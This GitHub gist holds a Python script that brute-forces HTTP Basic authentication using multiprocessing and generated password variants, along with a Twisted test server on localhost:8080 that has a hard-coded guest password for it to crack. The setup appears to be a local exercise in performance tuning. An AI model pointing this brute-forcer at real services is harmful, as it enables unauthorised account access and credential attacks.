-
-
Save zed/0a8860f4f9a824561b51 to your computer and use it in GitHub Desktop.
Brute force basic http authorization using httplib and multiprocessing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
"""Brute force basic http auth. | |
See http://codereview.stackexchange.com/questions/12659/brute-force-http-with-python | |
""" | |
from __future__ import print_function | |
import sys | |
import time | |
from base64 import b64encode | |
from itertools import repeat | |
from multiprocessing import Pool | |
from string import digits | |
from timeit import default_timer as timer | |
try: | |
from httplib import HTTPConnection | |
except ImportError: | |
from http.client import HTTPConnection # py3k | |
try: | |
from itertools import izip as zip | |
except ImportError: # py3k | |
zip = zip | |
def gen_passwords(): # ~400K/s | |
for a in "aA"+digits: | |
S = "sS$"+digits | |
for s1 in S: | |
for s2 in S: | |
for o in u"oO0$_癙": | |
yield u"p{a}{s1}{s2}w{o}rd".format(**locals()) | |
def report_error(*args): | |
print("error %s" % (args,), file=sys.stderr) | |
conn = None | |
def check(user, password, nretries=0): # ~1100/s | |
global conn # use 1 connection per process | |
if conn is None: | |
conn = HTTPConnection('localhost', 8080, strict=True) | |
conn.request('GET', '/', headers={'Authorization': b'Basic ' + b64encode( | |
(user + ':' + password).encode('utf-8'))}) # see rfc5987 | |
r = conn.getresponse() | |
r.read() # should read before sending the next request | |
if r.status == 401: | |
return | |
elif r.status == 200: | |
return (user, password) | |
elif nretries > 0: # retry | |
time.sleep(5./nretries**2) | |
return check(user, password, nretries=nretries-1) | |
else: | |
report_error((user, password), r.status) | |
def mp_check(args): | |
global conn | |
try: | |
return check(*args) | |
except Exception as e: | |
report_error(args, e) | |
import traceback | |
traceback.print_exc(file=sys.stderr) | |
try: conn.close() # prevent fd leaks | |
except: pass | |
conn = None # reset connection | |
def main(): | |
user = u"guest" | |
start = timer() | |
pool = Pool(processes=20) | |
args = zip(repeat(user), gen_passwords()) | |
for n, found in enumerate(pool.imap_unordered(mp_check, args), 1): | |
if found: | |
print("found %s" % (found,)) | |
break | |
t = timer() - start | |
print("Processed %d passwords in %.2f seconds (%.0f p/s)" % (n, t, n/t)) | |
if __name__=="__main__": | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
"""A password-protected per-user Twisted Web Server (rpy script) | |
see http://jcalderone.livejournal.com/53074.html | |
Install: | |
$ pip install twisted | |
Run: | |
$ twistd -n web --port="interface=localhost:tcp:8080" --resource-script=http-auth-server.py | |
Visit http://localhost:8080/ | |
""" | |
cache() # rpy magic to use the same CredentialFactory for multiple requests | |
from twisted.cred import checkers, portal as portals | |
from twisted.web import guard, static, resource as resources | |
from zope.interface import implements | |
class Resource(resources.Resource): | |
def __init__(self, user): | |
resources.Resource.__init__(self) | |
self.user = user | |
def getChild(self, path, request): | |
return static.Data("user %r path %r" % (self.user, path), "text/plain") | |
class Realm(object): | |
implements(portals.IRealm) | |
def requestAvatar(self, avatarId, mind, *interfaces): | |
if resources.IResource in interfaces: | |
return (resources.IResource, Resource(avatarId), lambda: None) | |
raise NotImplementedError() | |
checker = checkers.InMemoryUsernamePasswordDatabaseDontUse(guest=b'p4$Sw癙rd', | |
ascii=b'abc') | |
portal = portals.Portal(Realm(), [checker]) | |
credFactory = guard.BasicCredentialFactory("Test server") | |
resource = guard.HTTPAuthSessionWrapper(portal, [credFactory]) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment